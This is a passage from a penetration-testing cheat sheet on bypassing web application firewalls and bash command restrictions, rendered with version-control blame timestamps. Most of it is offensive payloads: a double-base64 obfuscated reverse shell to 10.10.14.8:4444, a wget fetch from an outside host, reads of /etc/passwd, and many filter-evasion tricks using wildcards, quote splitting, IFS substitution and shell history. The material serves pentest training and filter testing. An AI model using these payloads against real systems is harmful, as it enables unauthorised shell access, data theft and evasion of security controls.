2021-02-16 22:44:45 +00:00
|
|
|
# WAF Evasion / Bypass Bash Restrictions
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-02-16 22:44:45 +00:00
|
|
|
## Reverse Shell
|
|
|
|
```sh
|
|
|
|
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
|
2021-02-16 23:15:57 +00:00
|
|
|
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
|
|
|
|
#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
|
2021-02-16 22:44:45 +00:00
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
## Bypass Paths and forbidden commands
|
2021-02-16 22:44:45 +00:00
|
|
|
```sh
|
|
|
|
# Question mark binary substitution
|
|
|
|
/usr/bin/p?ng # /usr/bin/ping
|
|
|
|
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
|
|
|
|
|
|
|
|
# Wildcard(*) binary substitution
|
|
|
|
/usr/bin/who*mi # /usr/bin/whoami
|
|
|
|
|
|
|
|
# Wildcard + local directory arguments
|
|
|
|
touch -- -la # -- stops processing options after the --
|
|
|
|
ls *
|
|
|
|
|
|
|
|
# [chars]
|
|
|
|
/usr/bin/n[c] # /usr/bin/nc
|
|
|
|
|
|
|
|
# Quotes / Concatenation
|
|
|
|
'p'i'n'g # ping
|
|
|
|
"w"h"o"a"m"i # whoami
|
|
|
|
\u\n\a\m\e \-\a # uname -a
|
|
|
|
ech''o test # echo test
|
|
|
|
ech""o test # echo test
|
|
|
|
bas''e64 # base64
|
|
|
|
|
|
|
|
# Uninitialized variables: A uninitialized variable equals to null (nothing)
|
|
|
|
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
|
|
|
|
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
|
|
|
|
|
|
|
|
# Fake commands
|
|
|
|
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
|
|
|
|
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
|
|
|
|
|
|
|
|
# Concatenation of strings using history
|
|
|
|
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
|
|
|
|
mi # This will throw an error
|
|
|
|
whoa # This will throw an error
|
|
|
|
!-1!-2 # This will execute whoami
|
2020-07-15 15:43:14 +00:00
|
|
|
```
|
|
|
|
|
|
|
|
## Bypass forbidden spaces
|
2021-02-16 22:44:45 +00:00
|
|
|
```sh
|
|
|
|
# {form}
|
|
|
|
{cat,lol.txt} # cat lol.txt
|
|
|
|
{echo,test} # echo test
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-02-16 22:44:45 +00:00
|
|
|
## IFS - Internal field separator, change " " for any other character ("]" in this case)
|
|
|
|
cat${IFS}/etc/passwd # cat /etc/passwd
|
|
|
|
cat$IFS/etc/passwd # cat /etc/passwd
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-02-16 22:44:45 +00:00
|
|
|
# Put the command line in a variable and then execute it
|
2020-07-15 15:43:14 +00:00
|
|
|
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
|
2021-02-16 22:44:45 +00:00
|
|
|
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
|
|
|
|
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
|
|
|
|
# Other way, just change each space for ${IFS}
|
2020-07-15 15:43:14 +00:00
|
|
|
echo${IFS}test
|
|
|
|
|
2021-02-16 22:44:45 +00:00
|
|
|
# Using hex format
|
2020-07-15 15:43:14 +00:00
|
|
|
X=$'cat\x20/etc/passwd'&&$X
|
|
|
|
|
2021-02-16 22:44:45 +00:00
|
|
|
# New lines
|
2020-07-15 15:43:14 +00:00
|
|
|
p\
|
|
|
|
i\
|
|
|
|
n\
|
2021-02-16 22:44:45 +00:00
|
|
|
g # This 4 lines will equal to ping
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-02-16 22:44:45 +00:00
|
|
|
## Undefined variables and !
|
|
|
|
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
|
|
|
|
uname!-1\-a # This equals to uname -a
|
2020-07-15 15:43:14 +00:00
|
|
|
```
|
|
|
|
|
|
|
|
## Bypass IPs
|
2021-02-16 22:44:45 +00:00
|
|
|
```sh
|
|
|
|
# Decimal IPs
|
2020-07-15 15:43:14 +00:00
|
|
|
127.0.0.1 == 2130706433
|
|
|
|
```
|
|
|
|
|
2021-02-16 22:44:45 +00:00
|
|
|
## References & More
|
|
|
|
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %}
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-02-16 22:44:45 +00:00
|
|
|
{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" %}
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %}
|
|
|
|
|
|
|
|
{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %}
|